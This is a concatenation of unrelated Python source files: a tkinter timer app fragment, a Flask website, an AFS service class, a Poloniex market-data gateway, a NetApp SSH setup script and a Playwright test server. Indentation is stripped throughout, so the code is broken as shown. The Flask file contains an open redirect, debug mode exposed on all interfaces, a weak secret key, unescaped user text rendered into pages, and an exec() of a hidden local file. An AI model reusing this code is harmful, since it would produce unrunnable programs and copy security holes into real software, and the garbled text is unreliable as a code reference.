config["sound"] = sound_button.instate(["selected"])
config["notify"] = notify_button.instate(["selected"])
config["ontop"] = ontop_button.instate(["selected"])
setAlwaysOnTop(app)
saveConfig(config)
if theme == "Dark":
settings_btn.configure(image=settings_image_dark)
time_display.configure(fg="white")
time_selected_display.configure(fg="white")
elif theme == "Light":
settings_btn.configure(image=settings_image_light)
time_display.configure(fg="black")
time_selected_display.configure(fg="black")
sv_ttk.set_theme(theme.lower())
settings_window.destroy()
okbtn = ttk.Button(
tab_1,
text="Apply Changes",
command=lambda: ApplyChanges(),
style="Accent.TButton",
)
okbtn.place(x=250, y=230)
cancelbtn = ttk.Button(
tab_1, text="Cancel", command=lambda: settings_window.destroy()
)
cancelbtn.place(x=125, y=230)
okbtn_2 = ttk.Button(
tab_2,
text="Apply Changes",
command=lambda: ApplyChanges(),
style="Accent.TButton",
)
okbtn_2.place(x=250, y=230)
cancelbtn_2 = ttk.Button(
tab_2, text="Cancel", command=lambda: settings_window.destroy()
)
cancelbtn_2.place(x=125, y=230)
if system() != "Windows" or system() != "win":
notify_button.configure(state=DISABLED)
settings_window.mainloop()
# APP TRANSPERENCY
app.attributes("-alpha", config["transperency"])
# KEYBINDS
app.bind("key-space", startstopButtonPressed)
Grid.rowconfigure(app, 0, weight=1)
Grid.columnconfigure(app, 1, weight=1)
Grid.rowconfigure(app, 2, weight=1)
# IMAGES
settings_image_light = PhotoImage(file=f"./assets/images/light/settings.png")
settings_image_dark = PhotoImage(file=f"./assets/images/dark/settings.png")
# WINDOW FRAME
window = Frame(app)
# WINDOW ELEMENTS
time_selected_display = tkinter.Label(
master=app,
text=f"{timer_hours} Hours, {timer_minutes} Minutes, {timer_seconds} Seconds",
font=("Segoe UI Variable", 10),
bg=bg_color,
fg="white",
)
time_selected_display.grid(column=1, row=0, sticky="N", pady=10)
time_display = tkinter.Label(
master=app,
text=f"{timer_hours} : {timer_minutes} : {timer_seconds}",
font=("Segoe UI Variable", 30),
bg=bg_color,
fg="white",
)
time_display.grid(column=1, row=0, sticky="", rowspan=2, pady=20)
play_button = ttk.Button(
master=app,
text="Play",
width=25,
command=startstopButtonPressed,
style="Accent.TButton",
)
play_button.grid(column=1, row=0, sticky="S", rowspan=2)
manager_button = ttk.Button(
master=app,
text="Edit Timer",
command=lambda: createManagerWindow(
saveTimer, timer_minutes, timer_seconds, timer_hours
),
width=25,
)
manager_button.grid(column=1, row=2, sticky="N", pady=10)
settings_btn = ttk.Button(
master=app,
image=settings_image_dark,
command=lambda: createSettingsWindow(),
style="Toolbutton",
)
def sizechanged(e):
settings_btn.place(x=5, y=app.winfo_height() - 45)
if app.winfo_height() >= 220:
if app.winfo_height() > 250:
if app.winfo_height() > 270:
if app.winfo_height() > 290:
if app.winfo_height() > 330:
if app.winfo_height() > 350:
if app.winfo_height() > 370:
if app.winfo_height() > 390:
if app.winfo_width() > 420:
time_display.configure(
font=("Segoe UI Variable", 100)
)
time_selected_display.configure(
font=("Segoe UI Variable", 25)
)
else:
if app.winfo_width() > 420:
time_display.configure(
font=("Segoe UI Variable", 90)
)
time_selected_display.configure(
font=("Segoe UI Variable", 25)
)
else:
if app.winfo_width() > 400:
time_display.configure(font=("Segoe UI Variable", 80))
time_selected_display.configure(
font=("Segoe UI Variable", 25)
)
else:
if app.winfo_width() > 360:
time_display.configure(font=("Segoe UI Variable", 70))
time_selected_display.configure(
font=("Segoe UI Variable", 23)
)
else:
if app.winfo_width() > 360:
time_display.configure(font=("Segoe UI Variable", 60))
time_selected_display.configure(font=("Segoe UI Variable", 20))
else:
if app.winfo_width() >= 300:
time_display.configure(font=("Segoe UI Variable", 50))
time_selected_display.configure(font=("Segoe UI Variable", 17))
else:
if app.winfo_width() >= 300:
time_display.configure(font=("Segoe UI Variable", 40))
time_selected_display.configure(font=("Segoe UI Variable", 13))
else:
time_display.configure(font=("Segoe UI Variable", 30))
time_selected_display.configure(font=("Segoe UI Variable", 10))
play_button.configure(width=int(app.winfo_width() / 12))
manager_button.configure(width=int(app.winfo_width() / 12))
# THEMED IMAGES
if theme == "Dark":
settings_btn.configure(image=settings_image_dark)
GlobalBlur(HWND, Acrylic=True, Dark=True)
elif theme == "Light":
settings_btn.configure(image=settings_image_light)
GlobalBlur(HWND, Acrylic=True, hexColor=f"{bg_color}")
time_display.configure(fg="black")
time_selected_display.configure(fg="black")
app.bind("<Configure>", sizechanged)
# UPDATE
checkForUpdates(ver)
# TKINTER MAINLOOP
app.mainloop()
|
web.py
|
import os
import json
import yaml
import time
import flask
import distro
import psutil
import random
import string
import threading
import jinja2.exceptions
from flask import request
from turbo_flask import Turbo
from datetime import datetime
try:
from mcipc.query import Client
except Exception:  # server offline
pass
from html import escape, unescape
app = flask.Flask(__name__, static_url_path='/')
app.secret_key = ''.join(random.sample('ABCDEF0123456789', 6))
turbo = Turbo(app)
view_urls = {}
SERVER_NAME = 'paper'
@app.route('/x/<path:subpath>')
def show_subpath(subpath):
return f'Subpath {escape(subpath)}'
@app.route('/')
def home():
return flask.render_template('index.html')
@app.errorhandler(jinja2.exceptions.TemplateNotFound)
def template_not_found(error):
redirects = yaml.load(open('redirects.yml'), Loader=yaml.FullLoader)
path = error.name.replace('.html', '')
if path in redirects.keys():
list(flask.request.args.keys())[0] if flask.request.args.keys() else False
return flask.redirect(redirects[path])
return flask.render_template(f'error.html', title='Page not found!', description=f'Couldn\'t find this website: {error.name}')
@app.errorhandler(404)
def error_404(error):
return flask.render_template(f'error.html', title='File not found!', description=f'Couldn\'t find this file.')
@app.route('/view-create', methods=['GET', 'POST'])
def create_page():
global view_urls
if request.method == 'GET':
return flask.render_template(f'error.html', title='Unsupported request method!', description=f'This website can\'t be viewed with GET, as it\'s supposed to be POSTed.')
code = ''.join(random.sample(string.ascii_lowercase + string.ascii_uppercase + string.digits, 5))
view_urls[code] = request.get_json()
return f'https://onlix.me/view/{code}'
def fix_formatting(text: str):
return text.replace(' ', ' ').replace('\n', '\n<br>\n')
@app.route('/view/<code>')
def view_page(code):
global view_urls
if not view_urls.get(code):
return flask.render_template(f'error.html', title='View page not found!', description=f'Couldn\'t find this code: {code}')
return flask.render_template(f'view.html', title=fix_formatting(unescape(view_urls[code]['title'])), text=fix_formatting(unescape(view_urls[code]['text'])))
def readable_size(size):
return round(size/1000000000, 1)
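# Worked example (added for clarity, not in the original source): readable_size
# converts a byte count to gigabytes with one decimal place, e.g.
# readable_size(8589934592) == 8.6, since 8589934592 / 1e9 = 8.589..., rounded
# to one decimal.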
@app.route('/status')
def status_page():
ram = psutil.virtual_memory()
disk = psutil.disk_usage('/')
return flask.render_template(f'status.html',
cpu=psutil.cpu_percent(),
cpus=psutil.cpu_count(),
threads=psutil.cpu_count(logical=False),
ram=f'{readable_size(ram[3])}/{readable_size(ram[0])} GB ({ram[2]}%)',
disk=f'{readable_size(disk[1])}/{readable_size(disk[0])} GB ({disk[3]}%)',
pids=len(psutil.pids()),
boot_days=round((time.time()-psutil.boot_time())/86400),
os=f'{distro.linux_distribution()[0]} {distro.linux_distribution()[1]}',
)
@app.route('/status/mc')
def status_mc():
ops = [x['name'] for x in json.loads(open(f'/home/minecraft/{SERVER_NAME}/ops.json').read())]
bans = [x['name'] for x in json.loads(open(f"/home/minecraft/{SERVER_NAME}/banned-players.json").read())]
ip_bans = [x['name'] for x in json.loads(open(f"/home/minecraft/{SERVER_NAME}/banned-ips.json").read())]
whitelist = [x['name'] for x in json.loads(open(f'/home/minecraft/{SERVER_NAME}/whitelist.json').read())]
last_players = [x['name'] for x in json.loads(open(f'/home/minecraft/{SERVER_NAME}/usercache.json').read())[:5]]
with Client('127.0.0.1', 25565) as client:
server_data = client.stats(full=True)
plugin_list = list(server_data.plugins.values())[0]
return flask.render_template(f'status_mc.html',
players=server_data.players,
player_count=f'{server_data.num_players}/{server_data.max_players}' if server_data else '0/0',
version=server_data.version if server_data else 'Offline',
        game_type=server_data.game_type if server_data else 'Server is not available',
last_player=last_players,
last_players=len(last_players),
whitelist=whitelist,
whitelisted=len(whitelist),
plugin=plugin_list,
plugins=len(plugin_list),
op=ops,
ops=len(ops),
normal_ban=bans,
ip_ban=ip_bans,
normal_bans=len(bans),
ip_bans=len(ip_bans)
)
@app.route('/red')
def red(*args, **kwargs):
try:
return flask.redirect(unescape(list(flask.request.args.keys())[0]))
except IndexError:
return flask.redirect('/')
@app.route('/mc-console-log')
def mc_console_log():
log = []
lines = open(f'/home/minecraft/{SERVER_NAME}/.console_history').read().split('\n')[:-1]
for line in lines:
line_date = line.split(':')[0]
line_command = line.split(':')[1]
for x in ['w', 'msg', 'teammsg', 'tell']:
if line_command.startswith(x):
line_command = f'{x} [CENSORED]'
if line_command.startswith('ban-ip '):
line_command = 'ban-ip [CENSORED IP]'
if line_command.startswith('pardon-ip'):
line_command = 'pardon-ip [CENSORED IP]'
line_date = datetime.fromtimestamp(int(line_date)//1000).strftime('%d.%m.%y %H:%M:%S')
log.append({'time': line_date, 'command': line_command})
log.reverse()
return flask.render_template(f'mcclog.html', log=log, server_name=SERVER_NAME)
def read_chat(channel=None):
data = yaml.load(open('chats.yml'), Loader=yaml.FullLoader)
data = data or {}
return data.get(channel) or data
def send_message(channel, user='Guest', text=''):
chat = read_chat()
if not chat.get(channel):
chat[channel] = []
chat[channel].append({'user': user, 'text': text})
yaml.dump(chat, open('chats.yml', 'w'), sort_keys=False, default_flow_style=False)
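# Resulting chats.yml layout (inferred from read_chat/send_message above, shown
# for reference; channel names and messages are placeholders):
#
# general:
# - user: Guest
#   text: hello
# - user: Alice
#   text: hi there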
@app.route('/chat/<channel>', methods=['GET', 'POST'])
def chat_channel(channel):
if flask.request.form.to_dict().get('message'):
send_message(channel, flask.request.args.get('from') or 'Guest', flask.request.form.to_dict().get('message'))
if not read_chat(channel):
return flask.render_template(f'chat_error.html')
return flask.render_template(f'chat.html', channel=channel, messages=reversed(read_chat(channel)))
@app.before_first_request
def before_first_request():
threading.Thread(target=update_load).start()
def update_load():
with app.app_context():
while True:
time.sleep(5)
turbo.push(turbo.replace(flask.render_template('chat.html'), 'load'))
# @app.before_first_request
# def before_first_request():
# threading.Thread(target=update_load).start()
# def update_load():
# with app.app_context():
# while True:
# time.sleep(5)
# turbo.push(turbo.replace(flask.render_template('chat.html'), 'load'))
### RUN CLOSED SOURCE ###
exec(open('closed.hidden.py').read())
### ================= ###
if __name__ == '__main__':
app.run(host='0.0.0.0', port=2021, debug=True)
|
BaseService.py
|
#import inspect
import logging
import random
import string
import threading
from afs.util.AFSError import AFSError
import afs
import sys
class BaseService(object):
"""
Provides implementation for basic methods for all Services.
"""
def __init__(self, conf=None, LLAList=[]):
# CONF INIT
if conf:
self._CFG = conf
else:
self._CFG = afs.CONFIG
# LOG INIT
classLogLevel = getattr(self._CFG,"LogLevel_%s" % self.__class__.__name__, "").upper()
numericLogLevel = getattr(logging,classLogLevel, 0)
self.Logger=logging.getLogger("afs.service.%s" % self.__class__.__name__)
self.Logger.setLevel(numericLogLevel)
self.Logger.debug("initializing %s-Object with conf=%s" % (self.__class__.__name__, self._CFG))
# DB INIT
if self._CFG.DB_CACHE :
from afs.util.DBManager import DBManager
self.DBManager=DBManager()
else : # this is a simple object raising an error if called.
from afs.util.NODBManager import NODBManager
self.DBManager=NODBManager()
# LLA INIT
for lla in LLAList :
if lla == "vl":
from afs.lla.VLDBLLA import VLDBLLA
self._vlLLA = VLDBLLA()
elif lla == "vol" :
from afs.lla.VolServerLLA import VolServerLLA
self._volLLA = VolServerLLA()
elif lla == "bos" :
from afs.lla.BosServerLLA import BosServerLLA
self._bosLLA = BosServerLLA()
elif lla == "fs" :
from afs.lla.FileServerLLA import FileServerLLA
self._fsLLA = FileServerLLA()
elif lla == "rx" :
from afs.lla import RXPeerLLA
self._rxLLA = RXPeerLLA.RXPeerLLA()
elif lla == "ubik" :
from afs.lla import UbikPeerLLA
self._ubikLLA = UbikPeerLLA.UbikPeerLLA()
else :
raise AFSError("internal Error. invalid LLA '%s' requested" % lla)
# Async INIT
# list of active threads in this service
self.active_tasks={}
self.task_results={}
def wait_for_task(self, task_name) :
self.Logger.debug("task_results=%s" % self.task_results)
self.active_tasks[task_name].join()
return
def get_task_result(self, task_name) :
self.Logger.debug("task_results=%s" % self.task_results)
return self.task_results.pop(task_name)
def do_return(self, thread_name, result) :
"""
Either just return the result or write it into self.task_results,
depending on if we are async or not.
"""
if thread_name == "" :
return result
else :
self.task_results[thread_name] = result
return thread_name
def get_thread_name(self) :
"""
return a new unique thread-name
"""
new_name = ""
while new_name == "" or new_name in self.active_tasks :
new_name = ""
i = 0
while ( i < 8 ) :
new_name += random.choice(string.letters + string.digits)
i += 1
return new_name
def get_archived(self, historic_class, earliest=None, latest=None, limit=-1, **filter_dict) :
"""
mapped_object has to be declared in the specific service itself.
return list of mapped objects from the archive
"""
query = self.DBManager.DbSession.query(historic_class).filter_by(**filter_dict)
if earliest != None :
query = query.filter( historic_class.db_creation_date > earliest)
if latest != None :
query = query.filter( historic_class.db_creation_date < latest)
if limit == -1 :
archived_objs = query.all()
else :
archived_objs = query.limit(limit)
return archived_objs
def task_wrapper(method) :
"""
This decorator is meant for either calling a method directly
or execute it in a different thread.
"""
def wrapped(self, *args, **kwargs):
"""actual wrapper code"""
if not kwargs.has_key("async") :
kwargs["async"] = False
async = kwargs["async"]
# get cmdlist and parsefunction from method
# parse_fct is parsing the output of the executed function
# ParseInfo are any info the parse_fct requires beside ret,
# outout and outerr
#parse_parameterlist = {"args" : args, "kwargs" : kwargs }
#argspec = inspect.getargspec(method)
#self.Logger.debug("argspec=%s" % (argspec,))
#count = 0
#if argspec[3] != None :
# for key in argspec[0][-len(argspec[3]):] :
# self.Logger.debug("checking argspec key=%s" % key)
# value = argspec[3][count]
# self.Logger.debug("value=%s" % value)
# count += 1
# if not parse_parameterlist["kwargs"].has_key(key) :
# parse_parameterlist["kwargs"][key] = value
self.Logger.debug("args=%s" % (args,))
self.Logger.debug("kwargs=%s" % (kwargs,))
if async :
this_thread_name = self.get_thread_name()
kwargs["_thread_name"] = this_thread_name
this_thread = threading.Thread(name=this_thread_name, target=method, args=(self, ) + args, kwargs=kwargs)
this_thread.start()
self.active_tasks[this_thread_name]=this_thread
return this_thread_name
else :
return method(self, *args, **kwargs)
return wrapped
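# Hedged usage sketch (not part of the original module): a concrete service
# would decorate a long-running method with @task_wrapper and pass async=True
# to run it in a background thread, then collect the result with
# wait_for_task()/get_task_result(). "VolumeService", "move_volume" and
# "do_the_move" are hypothetical names used only for illustration.
#
#   class VolumeService(BaseService):
#       @task_wrapper
#       def move_volume(self, volume, _thread_name="", **kwargs):
#           result = do_the_move(volume)   # placeholder for the real work
#           return self.do_return(_thread_name, result)
#
#   service = VolumeService(LLAList=["vl", "vol"])
#   task = service.move_volume("vol.home", async=True)  # returns a task name
#   service.wait_for_task(task)
#   print(service.get_task_result(task))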
|
poloniex.py
|
from befh.restful_api_socket import RESTfulApiSocket
from befh.exchanges.gateway import ExchangeGateway
from befh.market_data import L2Depth, Trade
from befh.util import Logger
from befh.instrument import Instrument
from befh.clients.sql_template import SqlClientTemplate
from functools import partial
from datetime import datetime
import threading
import time
class ExchGwApiPoloniex(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self, proxy=None):
self.proxy = proxy
RESTfulApiSocket.__init__(self, proxy=proxy)
@classmethod
def get_trades_timestamp_field_name(cls):
return 'date'
@classmethod
def get_trades_timestamp_format(cls):
return '%Y-%m-%d %H:%M:%S'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_trade_side_field_name(cls):
return 'type'
@classmethod
def get_trade_id_field_name(cls):
return 'tradeID'
@classmethod
def get_trade_price_field_name(cls):
return 'rate'
@classmethod
def get_trade_volume_field_name(cls):
return 'amount'
@classmethod
def get_order_book_link(cls, instmt):
return "https://poloniex.com/public?command=returnOrderBook¤cyPair=%s&depth=5" % instmt.get_instmt_code()
@classmethod
def get_trades_link(cls, instmt):
if instmt.get_last_trade() is not None:
return "https://poloniex.com/public?command=returnTradeHistory¤cyPair=%s&start=%d" % \
(instmt.get_instmt_code(), int(instmt.get_last_trade().update_date_time.timestamp()) - 1)
else:
return "https://poloniex.com/public?command=returnTradeHistory¤cyPair=%s" % \
(instmt.get_instmt_code())
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
l2_depth = L2Depth()
keys = list(raw.keys())
if cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
# Date time
l2_depth.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")
# Bids
bids = raw[cls.get_bids_field_name()]
bids = sorted(bids, key=lambda x: x[0], reverse=True)
for i in range(0, 5):
l2_depth.bids[i].price = float(bids[i][0]) if not isinstance(bids[i][0], float) else bids[i][0]
l2_depth.bids[i].volume = float(bids[i][1]) if not isinstance(bids[i][1], float) else bids[i][1]
# Asks
asks = raw[cls.get_asks_field_name()]
asks = sorted(asks, key=lambda x: x[0])
for i in range(0, 5):
l2_depth.asks[i].price = float(asks[i][0]) if not isinstance(asks[i][0], float) else asks[i][0]
l2_depth.asks[i].volume = float(asks[i][1]) if not isinstance(asks[i][1], float) else asks[i][1]
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trades_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
date_time = raw[cls.get_trades_timestamp_field_name()]
date_time = datetime.strptime(date_time, cls.get_trades_timestamp_format())
trade.date_time = date_time.strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = 1 if raw[cls.get_trade_side_field_name()] == 'buy' else 2
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt, proxy=None):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt), proxy=proxy)
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt, proxy=None):
"""
Get trades
:param instmt: Instrument
:param trade_id: Trade id
:return: List of trades
"""
link = cls.get_trades_link(instmt)
res = cls.request(link, proxy=proxy)
trades = []
if len(res) > 0:
for i in range(len(res)-1, -1, -1):
trade = cls.parse_trade(instmt=instmt,
raw=res[i])
trades.append(trade)
return trades
class ExchGwPoloniex(ExchangeGateway):
"""
Exchange gateway Poloniex
"""
def __init__(self, db_clients, proxy=None):
"""
Constructor
        :param db_clients: List of database clients
"""
ExchangeGateway.__init__(self, ExchGwApiPoloniex(proxy=proxy), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Poloniex'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt, proxy=self.api_socket.proxy)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
        Get trades worker thread
:param instmt: Instrument name
"""
while True:
try:
ret = self.api_socket.get_trades(instmt, proxy=self.api_socket.proxy)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = threading.Thread(target=partial(self.get_order_book_worker, instmt))
t2 = threading.Thread(target=partial(self.get_trades_worker, instmt))
t1.start()
t2.start()
return [t1, t2]
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Poloniex'
instmt_name = 'BTC_NXT'
instmt_code = 'BTC_NXT'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_client = SqlClientTemplate()
exch = ExchGwPoloniex([db_client])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_recovered(False)
exch.get_order_book_worker(instmt)
#exch.get_trades_worker(instmt)
|
ssh_setup_node_multi.py
|
#!/usr/bin/python3
# Author: Adrian Bronder
# Date: October 15th, 2018
# Description: Setup preparing nodes for cluster create/join
import sys
import time
from threading import Thread
from pexpect import pxssh
import re
import json
def print_usage():
print("\nUsage: " + __file__ + " <config_file>\n")
print("<config_file> -- JSON file with setup parameters\n")
def exec_ssh(session, match_str, send_string, hostname):
found = False
if(not match_str is None):
# Load content
session.prompt()
# Get strings by row
ssh_return = session.before.decode('UTF-8').strip().split("\n")
# Print last row
print(hostname + " -> I found this string: " + ssh_return[-1])
if(re.match(match_str, ssh_return[-1])):
found = True
# Compare with input RegEx and send string if valid
if(not send_string is None):
if((match_str is None) or \
found):
if(send_string == "c") or \
(send_string == "d"):
print(hostname + " -> I am sending 'ctrl-" + send_string + "'")
session.sendcontrol(send_string)
else:
print(hostname + " -> I am sending '" + str(send_string) + "'")
session.sendline(str(send_string))
else:
print(hostname + " -> Unexpected string..." + send_string)
return found
def node_setup(node):
sp = pxssh.pxssh()
print(node["node-name"] + " -> Logging into SP")
if(not sp.login(node["sp-ip"], node["user"], node["password"], auto_prompt_reset=False)):
print(node["node-name"] + " -> SSH session failed on login.")
print(str(sp))
else:
print(node["node-name"] + " -> SSH session login successful")
# Switching to system console
if(not exec_ssh(sp, "^SP.*>", "system console", node["node-name"])):
print(node["node-name"] + " -> Unexpected prompt. Exiting NOW!")
sys.exit(1)
exec_ssh(sp, None, "", node["node-name"])
# Get to default ONTAP prompt
counter = 0
while not exec_ssh(sp, "::\**>", None, node["node-name"]) and \
(counter < 5):
last_row = sp.before.decode('UTF-8').strip().split("\n")[-1]
if(str("login:") in last_row):
exec_ssh(sp, None, node["user"], node["node-name"])
elif("assword:" in last_row):
exec_ssh(sp, None, node["password"], node["node-name"])
else:
exec_ssh(sp, None, "c", node["node-name"])
counter = counter + 1
if(counter >= 5):
print(node["node-name"] + " -> Could not set prompt. Exiting NOW!")
sys.exit(1)
# preparing console - no page breaks
exec_ssh(sp, None, "rows 0", node["node-name"])
# starting cluster setup
exec_ssh(sp, None, "cluster setup", node["node-name"])
# Acknowledging ASUP warning
if(not exec_ssh(sp, "Type yes to confirm and continue \{yes\}:", "yes", node["node-name"])):
print(node["node-name"] + " -> Unexpected return. Exiting NOW!")
sys.exit(1)
# Send node management details
if(not exec_ssh(sp, "Enter the node management interface port \[", "e0M", node["node-name"])):
print(node["node-name"] + " -> Unexpected return. Exiting NOW!")
sys.exit(1)
exec_ssh(sp, None, node["ip"], node["node-name"])
exec_ssh(sp, None, "255.255.255.0", node["node-name"])
exec_ssh(sp, None, "10.65.59.1", node["node-name"])
# Send "Enter" to continue on command line
exec_ssh(sp, None, "", node["node-name"])
exec_ssh(sp, None, "", node["node-name"])
# Exit cluster setup
if(not exec_ssh(sp, "Do you want to create a new cluster or join an existing cluster?.*", "c", node["node-name"])):
print(node["node-name"] + " -> Unexpected return. Exiting NOW!")
sys.exit(1)
# Set admin password
if(not exec_ssh(sp, "::\**>", "security login password -user " + node["user"], node["node-name"])):
print(node["node-name"] + " -> Unexpected return. Exiting NOW!")
sys.exit(1)
exec_ssh(sp, None, "", node["node-name"])
exec_ssh(sp, None, node["password"], node["node-name"])
exec_ssh(sp, None, node["password"], node["node-name"])
# Log out from ONTAP properly and return to service processor prompt
exec_ssh(sp, "::\**>", "exit", node["node-name"])
exec_ssh(sp, None, "d", node["node-name"])
print(node["node-name"] + " -> logging out...")
sp.logout()
if(len(sys.argv) != 2):
print_usage()
sys.exit(1)
with open(sys.argv[1]) as json_file:
json_data = json.load(json_file)
setup_threads = []
for cluster in json_data["clusters"]:
for node in cluster["cluster-nodes"]:
try:
t = Thread(target=node_setup, args=(node,))
t.start()
setup_threads.append(t)
except:
print("Error: unable to start thread")
for x in setup_threads:
x.join()
print("I am done")
|
server.py
|
# Copyright (c) Microsoft Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
import asyncio
import contextlib
import gzip
import mimetypes
import socket
import threading
from contextlib import closing
from http import HTTPStatus
from typing import Any, Callable, Dict, Generator, Generic, Set, Tuple, TypeVar
from urllib.parse import urlparse
from autobahn.twisted.websocket import WebSocketServerFactory, WebSocketServerProtocol
from OpenSSL import crypto
from twisted.internet import reactor, ssl
from twisted.internet.protocol import ClientFactory
from twisted.web import http
from playwright._impl._path_utils import get_file_dirname
_dirname = get_file_dirname()
def find_free_port() -> int:
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("", 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
T = TypeVar("T")
class ExpectResponse(Generic[T]):
def __init__(self) -> None:
self._value: T
@property
def value(self) -> T:
return self._value
class Server:
protocol = "http"
def __init__(self) -> None:
self.PORT = find_free_port()
self.EMPTY_PAGE = f"{self.protocol}://localhost:{self.PORT}/empty.html"
self.PREFIX = f"{self.protocol}://localhost:{self.PORT}"
self.CROSS_PROCESS_PREFIX = f"{self.protocol}://127.0.0.1:{self.PORT}"
# On Windows, this list can be empty, reporting text/plain for scripts.
mimetypes.add_type("text/html", ".html")
mimetypes.add_type("text/css", ".css")
mimetypes.add_type("application/javascript", ".js")
mimetypes.add_type("image/png", ".png")
mimetypes.add_type("font/woff2", ".woff2")
def __repr__(self) -> str:
return self.PREFIX
@abc.abstractmethod
def listen(self, factory: ClientFactory) -> None:
pass
def start(self) -> None:
request_subscribers: Dict[str, asyncio.Future] = {}
auth: Dict[str, Tuple[str, str]] = {}
csp: Dict[str, str] = {}
routes: Dict[str, Callable[[http.Request], Any]] = {}
gzip_routes: Set[str] = set()
self.request_subscribers = request_subscribers
self.auth = auth
self.csp = csp
self.routes = routes
self.gzip_routes = gzip_routes
static_path = _dirname / "assets"
class TestServerHTTPHandler(http.Request):
def process(self) -> None:
request = self
if request.content:
self.post_body = request.content.read()
request.content.seek(0, 0)
else:
self.post_body = None
uri = urlparse(request.uri.decode())
path = uri.path
if request_subscribers.get(path):
request_subscribers[path].set_result(request)
request_subscribers.pop(path)
if auth.get(path):
authorization_header = request.requestHeaders.getRawHeaders(
"authorization"
)
creds_correct = False
if authorization_header:
creds_correct = auth.get(path) == (
request.getUser().decode(),
request.getPassword().decode(),
)
if not creds_correct:
request.setHeader(
b"www-authenticate", 'Basic realm="Secure Area"'
)
request.setResponseCode(HTTPStatus.UNAUTHORIZED)
request.finish()
return
if csp.get(path):
request.setHeader(b"Content-Security-Policy", csp[path])
if routes.get(path):
routes[path](request)
return
file_content = None
try:
file_content = (static_path / path[1:]).read_bytes()
request.setHeader(b"Content-Type", mimetypes.guess_type(path)[0])
request.setHeader(b"Cache-Control", "no-cache, no-store")
if path in gzip_routes:
request.setHeader("Content-Encoding", "gzip")
request.write(gzip.compress(file_content))
else:
request.write(file_content)
self.setResponseCode(HTTPStatus.OK)
except (FileNotFoundError, IsADirectoryError, PermissionError):
request.setResponseCode(HTTPStatus.NOT_FOUND)
self.finish()
class MyHttp(http.HTTPChannel):
requestFactory = TestServerHTTPHandler
class MyHttpFactory(http.HTTPFactory):
protocol = MyHttp
self.listen(MyHttpFactory())
async def wait_for_request(self, path: str) -> http.Request:
if path in self.request_subscribers:
return await self.request_subscribers[path]
future: asyncio.Future["http.Request"] = asyncio.Future()
self.request_subscribers[path] = future
return await future
@contextlib.contextmanager
def expect_request(
self, path: str
) -> Generator[ExpectResponse[http.Request], None, None]:
future = asyncio.create_task(self.wait_for_request(path))
cb_wrapper: ExpectResponse[http.Request] = ExpectResponse()
def done_cb(task: asyncio.Task) -> None:
cb_wrapper._value = future.result()
future.add_done_callback(done_cb)
